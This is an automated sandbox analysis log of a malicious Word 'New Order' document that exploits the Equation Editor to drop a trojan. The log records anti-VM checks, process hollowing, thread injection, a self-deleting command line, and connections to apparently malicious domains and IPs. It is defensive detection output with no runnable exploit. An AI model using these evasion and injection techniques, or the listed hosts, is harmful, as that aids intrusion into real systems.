      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFB50 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EF900 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EF9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F0078 NtResumeThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F0060 NtQuerySection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F0048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F10D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F1148 NtOpenThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F01D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EF8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EF938 NtWriteFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F1930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F0C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023EFD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023F1D80 NtSuspendThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BA350 NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BA400 NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BA480 NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BA530 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BA30A NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BA3FD NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BA47A NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BA52B NtAllocateVirtualMemory,
      Source: harshmanzx[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: hasmenhtk721.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
      Source: RFQ9003930 New Order.docVirustotal: Detection: 28%
      Source: RFQ9003930 New Order.docReversingLabs: Detection: 28%
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Q9003930 New Order.docJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF594.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/8@4/3
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: hasmenhtk721.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: hasmenhtk721.exe, 00000005.00000002.477204185.0000000000504000.00000004.00000020.sdmp

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: harshmanzx[1].exe.2.dr, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: hasmenhtk721.exe.2.dr, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 4.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 4.2.hasmenhtk721.exe.bb0000.2.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 5.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 5.2.hasmenhtk721.exe.bb0000.3.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041716F push ebx; ret
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0040E288 push ebp; ret
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041D4F2 push eax; ret
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041D4FB push eax; ret
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041D4A5 push eax; ret
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041D55C push eax; ret
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0041ED7F push dword ptr [F1875581h]; ret
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CBDFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_023FDFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000B716F push ebx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000AE288 push ebp; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BD4A5 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BD4FB push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BD4F2 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BD55C push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000BED7F push dword ptr [F1875581h]; ret
      Source: initial sampleStatic PE information: section name: .text entropy: 7.04755215007
      Source: initial sampleStatic PE information: section name: .text entropy: 7.04755215007
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hasmenhtk721.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xEA
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Yara detected AntiVM3Show sources
      Source: Yara matchFile source: 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: hasmenhtk721.exe PID: 2308, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
      Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000A9904 second address: 00000000000A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000A9B6E second address: 00000000000A9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2652Thread sleep time: -240000s >= -30000s
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe TID: 760Thread sleep time: -34097s >= -30000s
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe TID: 2560Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exe TID: 2836Thread sleep time: -40000s >= -30000s
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00409AA0 rdtsc
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeThread delayed: delay time: 34097
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeThread delayed: delay time: 922337203685477
      Source: explorer.exe, 00000006.00000000.468484505.0000000008438000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000k
      Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000006.00000000.449394669.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000006.00000000.468484505.0000000008438000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0N
      Source: explorer.exe, 00000006.00000000.465258321.00000000045D4000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
      Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmpBinary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00409AA0 rdtsc
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CA00EA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CA0080 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_00CC26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_024026F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeCode function: 5_2_0040ACE0 LdrLoadDll,
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.ceasa.club
      Source: C:\Windows\explorer.exeNetwork Connect: 166.62.10.138 80
      Source: C:\Windows\explorer.exeDomain query: www.eastwestasia-thailand.com
      Source: C:\Windows\explorer.exeDomain query: www.alzayantourism.com
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 70000
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeMemory written: C:\Users\user\AppData\Roaming\hasmenhtk721.exe base: 400000 value starts with: 4D5A
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeThread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exeThread register set: target process: 1764
      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1764
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
